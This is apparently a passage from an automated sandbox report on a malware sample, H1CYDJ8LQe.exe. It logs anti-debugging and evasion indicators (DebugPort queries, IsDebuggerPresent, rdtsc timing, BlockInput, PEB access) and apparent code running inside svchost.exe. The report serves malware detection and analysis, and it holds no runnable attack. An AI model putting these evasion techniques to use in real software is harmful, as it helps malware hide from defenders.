            Source: SwTeWVAxKdsP.exe, 00000007.00000002.3526665940.000000000081F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe API call chain: ExitProcess graph end node graph_0-84773
            Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\dvdplay.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0347096E rdtsc 1_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004177C3 LdrLoadDll, 1_2_004177C3
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe Code function: 0_2_0045A370 BlockInput, 0_2_0045A370
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW, 0_2_0040D590
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress, 0_2_0040EBD0
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe Code function: 0_2_02E734B0 mov eax, dword ptr fs:[00000030h] 0_2_02E734B0
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe Code function: 0_2_02E73510 mov eax, dword ptr fs:[00000030h] 0_2_02E73510
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe Code function: 0_2_02E71E70 mov eax, dword ptr fs:[00000030h] 0_2_02E71E70
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h] 1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034B035C mov eax, dword ptr fs:[00000030h] 1_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034B035C mov ecx, dword ptr fs:[00000030h] 1_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034FA352 mov eax, dword ptr fs:[00000030h] 1_2_034FA352
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034D8350 mov ecx, dword ptr fs:[00000030h] 1_2_034D8350
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0350634F mov eax, dword ptr fs:[00000030h] 1_2_0350634F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034D437C mov eax, dword ptr fs:[00000030h] 1_2_034D437C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0346A30B mov eax, dword ptr fs:[00000030h] 1_2_0346A30B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0342C310 mov ecx, dword ptr fs:[00000030h] 1_2_0342C310
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03450310 mov ecx, dword ptr fs:[00000030h] 1_2_03450310
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03508324 mov eax, dword ptr fs:[00000030h] 1_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03508324 mov ecx, dword ptr fs:[00000030h] 1_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034EC3CD mov eax, dword ptr fs:[00000030h] 1_2_034EC3CD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034B63C0 mov eax, dword ptr fs:[00000030h] 1_2_034B63C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034DE3DB mov eax, dword ptr fs:[00000030h] 1_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034DE3DB mov ecx, dword ptr fs:[00000030h] 1_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034D43D4 mov eax, dword ptr fs:[00000030h] 1_2_034D43D4
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h] 1_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0344E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034663FF mov eax, dword ptr fs:[00000030h] 1_2_034663FF
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0342E388 mov eax, dword ptr fs:[00000030h] 1_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0345438F mov eax, dword ptr fs:[00000030h] 1_2_0345438F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03428397 mov eax, dword ptr fs:[00000030h] 1_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034B8243 mov eax, dword ptr fs:[00000030h] 1_2_034B8243
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034B8243 mov ecx, dword ptr fs:[00000030h] 1_2_034B8243
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0350625D mov eax, dword ptr fs:[00000030h] 1_2_0350625D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0342A250 mov eax, dword ptr fs:[00000030h] 1_2_0342A250
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03436259 mov eax, dword ptr fs:[00000030h] 1_2_03436259
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034EA250 mov eax, dword ptr fs:[00000030h] 1_2_034EA250
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03434260 mov eax, dword ptr fs:[00000030h] 1_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0342826B mov eax, dword ptr fs:[00000030h] 1_2_0342826B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h] 1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0342823B mov eax, dword ptr fs:[00000030h] 1_2_0342823B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0343A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035062D6 mov eax, dword ptr fs:[00000030h] 1_2_035062D6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034402E1 mov eax, dword ptr fs:[00000030h] 1_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0346E284 mov eax, dword ptr fs:[00000030h] 1_2_0346E284
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034B0283 mov eax, dword ptr fs:[00000030h] 1_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034402A0 mov eax, dword ptr fs:[00000030h] 1_2_034402A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h] 1_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034C62A0 mov ecx, dword ptr fs:[00000030h] 1_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034C4144 mov eax, dword ptr fs:[00000030h] 1_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034C4144 mov ecx, dword ptr fs:[00000030h] 1_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0342C156 mov eax, dword ptr fs:[00000030h] 1_2_0342C156
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034C8158 mov eax, dword ptr fs:[00000030h] 1_2_034C8158
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03436154 mov eax, dword ptr fs:[00000030h] 1_2_03436154
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03504164 mov eax, dword ptr fs:[00000030h] 1_2_03504164
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h] 1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034DE10E mov ecx, dword ptr fs:[00000030h] 1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034DA118 mov ecx, dword ptr fs:[00000030h] 1_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034DA118 mov eax, dword ptr fs:[00000030h] 1_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034F0115 mov eax, dword ptr fs:[00000030h] 1_2_034F0115
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03460124 mov eax, dword ptr fs:[00000030h] 1_2_03460124
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034F61C3 mov eax, dword ptr fs:[00000030h] 1_2_034F61C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034AE1D0 mov eax, dword ptr fs:[00000030h] 1_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034AE1D0 mov ecx, dword ptr fs:[00000030h] 1_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035061E5 mov eax, dword ptr fs:[00000030h] 1_2_035061E5
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034601F8 mov eax, dword ptr fs:[00000030h] 1_2_034601F8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03470185 mov eax, dword ptr fs:[00000030h] 1_2_03470185
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034EC188 mov eax, dword ptr fs:[00000030h] 1_2_034EC188
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034D4180 mov eax, dword ptr fs:[00000030h] 1_2_034D4180
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034B019F mov eax, dword ptr fs:[00000030h] 1_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0342A197 mov eax, dword ptr fs:[00000030h] 1_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03432050 mov eax, dword ptr fs:[00000030h] 1_2_03432050
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034B6050 mov eax, dword ptr fs:[00000030h] 1_2_034B6050
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0345C073 mov eax, dword ptr fs:[00000030h] 1_2_0345C073
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034B4000 mov ecx, dword ptr fs:[00000030h] 1_2_034B4000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h] 1_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0344E016 mov eax, dword ptr fs:[00000030h] 1_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0342A020 mov eax, dword ptr fs:[00000030h] 1_2_0342A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342C020 mov eax, dword ptr fs:[00000030h]1_2_0342C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6030 mov eax, dword ptr fs:[00000030h]1_2_034C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B20DE mov eax, dword ptr fs:[00000030h]1_2_034B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0342A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034380E9 mov eax, dword ptr fs:[00000030h]1_2_034380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B60E0 mov eax, dword ptr fs:[00000030h]1_2_034B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342C0F0 mov eax, dword ptr fs:[00000030h]1_2_0342C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034720F0 mov ecx, dword ptr fs:[00000030h]1_2_034720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343208A mov eax, dword ptr fs:[00000030h]1_2_0343208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034280A0 mov eax, dword ptr fs:[00000030h]1_2_034280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C80A8 mov eax, dword ptr fs:[00000030h]1_2_034C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F60B8 mov eax, dword ptr fs:[00000030h]1_2_034F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F60B8 mov ecx, dword ptr fs:[00000030h]1_2_034F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346674D mov esi, dword ptr fs:[00000030h]1_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346674D mov eax, dword ptr fs:[00000030h]1_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346674D mov eax, dword ptr fs:[00000030h]1_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430750 mov eax, dword ptr fs:[00000030h]1_2_03430750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE75D mov eax, dword ptr fs:[00000030h]1_2_034BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472750 mov eax, dword ptr fs:[00000030h]1_2_03472750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472750 mov eax, dword ptr fs:[00000030h]1_2_03472750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B4755 mov eax, dword ptr fs:[00000030h]1_2_034B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438770 mov eax, dword ptr fs:[00000030h]1_2_03438770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C700 mov eax, dword ptr fs:[00000030h]1_2_0346C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430710 mov eax, dword ptr fs:[00000030h]1_2_03430710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03460710 mov eax, dword ptr fs:[00000030h]1_2_03460710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C720 mov eax, dword ptr fs:[00000030h]1_2_0346C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C720 mov eax, dword ptr fs:[00000030h]1_2_0346C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346273C mov eax, dword ptr fs:[00000030h]1_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346273C mov ecx, dword ptr fs:[00000030h]1_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346273C mov eax, dword ptr fs:[00000030h]1_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AC730 mov eax, dword ptr fs:[00000030h]1_2_034AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343C7C0 mov eax, dword ptr fs:[00000030h]1_2_0343C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B07C3 mov eax, dword ptr fs:[00000030h]1_2_034B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034527ED mov eax, dword ptr fs:[00000030h]1_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034527ED mov eax, dword ptr fs:[00000030h]1_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034527ED mov eax, dword ptr fs:[00000030h]1_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE7E1 mov eax, dword ptr fs:[00000030h]1_2_034BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034347FB mov eax, dword ptr fs:[00000030h]1_2_034347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034347FB mov eax, dword ptr fs:[00000030h]1_2_034347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D678E mov eax, dword ptr fs:[00000030h]1_2_034D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034307AF mov eax, dword ptr fs:[00000030h]1_2_034307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E47A0 mov eax, dword ptr fs:[00000030h]1_2_034E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344C640 mov eax, dword ptr fs:[00000030h]1_2_0344C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F866E mov eax, dword ptr fs:[00000030h]1_2_034F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F866E mov eax, dword ptr fs:[00000030h]1_2_034F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A660 mov eax, dword ptr fs:[00000030h]1_2_0346A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A660 mov eax, dword ptr fs:[00000030h]1_2_0346A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03462674 mov eax, dword ptr fs:[00000030h]1_2_03462674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE609 mov eax, dword ptr fs:[00000030h]1_2_034AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472619 mov eax, dword ptr fs:[00000030h]1_2_03472619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E627 mov eax, dword ptr fs:[00000030h]1_2_0344E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03466620 mov eax, dword ptr fs:[00000030h]1_2_03466620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03468620 mov eax, dword ptr fs:[00000030h]1_2_03468620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343262C mov eax, dword ptr fs:[00000030h]1_2_0343262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0346A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A6C7 mov eax, dword ptr fs:[00000030h]1_2_0346A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE6F2 mov eax, dword ptr fs:[00000030h]1_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE6F2 mov eax, dword ptr fs:[00000030h]1_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE6F2 mov eax, dword ptr fs:[00000030h]1_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE6F2 mov eax, dword ptr fs:[00000030h]1_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B06F1 mov eax, dword ptr fs:[00000030h]1_2_034B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B06F1 mov eax, dword ptr fs:[00000030h]1_2_034B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434690 mov eax, dword ptr fs:[00000030h]1_2_03434690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434690 mov eax, dword ptr fs:[00000030h]1_2_03434690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C6A6 mov eax, dword ptr fs:[00000030h]1_2_0346C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034666B0 mov eax, dword ptr fs:[00000030h]1_2_034666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438550 mov eax, dword ptr fs:[00000030h]1_2_03438550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438550 mov eax, dword ptr fs:[00000030h]1_2_03438550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346656A mov eax, dword ptr fs:[00000030h]1_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346656A mov eax, dword ptr fs:[00000030h]1_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346656A mov eax, dword ptr fs:[00000030h]1_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6500 mov eax, dword ptr fs:[00000030h]1_2_034C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]1_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]1_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]1_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]1_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]1_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]1_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E53E mov eax, dword ptr fs:[00000030h]1_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E53E mov eax, dword ptr fs:[00000030h]1_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E53E mov eax, dword ptr fs:[00000030h]1_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E53E mov eax, dword ptr fs:[00000030h]1_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E53E mov eax, dword ptr fs:[00000030h]1_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E5CF mov eax, dword ptr fs:[00000030h]1_2_0346E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E5CF mov eax, dword ptr fs:[00000030h]1_2_0346E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034365D0 mov eax, dword ptr fs:[00000030h]1_2_034365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A5D0 mov eax, dword ptr fs:[00000030h]1_2_0346A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A5D0 mov eax, dword ptr fs:[00000030h]1_2_0346A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034325E0 mov eax, dword ptr fs:[00000030h]1_2_034325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C5ED mov eax, dword ptr fs:[00000030h]1_2_0346C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C5ED mov eax, dword ptr fs:[00000030h]1_2_0346C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03432582 mov eax, dword ptr fs:[00000030h]1_2_03432582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03432582 mov ecx, dword ptr fs:[00000030h]1_2_03432582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03464588 mov eax, dword ptr fs:[00000030h]1_2_03464588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E59C mov eax, dword ptr fs:[00000030h]1_2_0346E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B05A7 mov eax, dword ptr fs:[00000030h]1_2_034B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B05A7 mov eax, dword ptr fs:[00000030h]1_2_034B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B05A7 mov eax, dword ptr fs:[00000030h]1_2_034B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034545B1 mov eax, dword ptr fs:[00000030h]1_2_034545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034545B1 mov eax, dword ptr fs:[00000030h]1_2_034545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
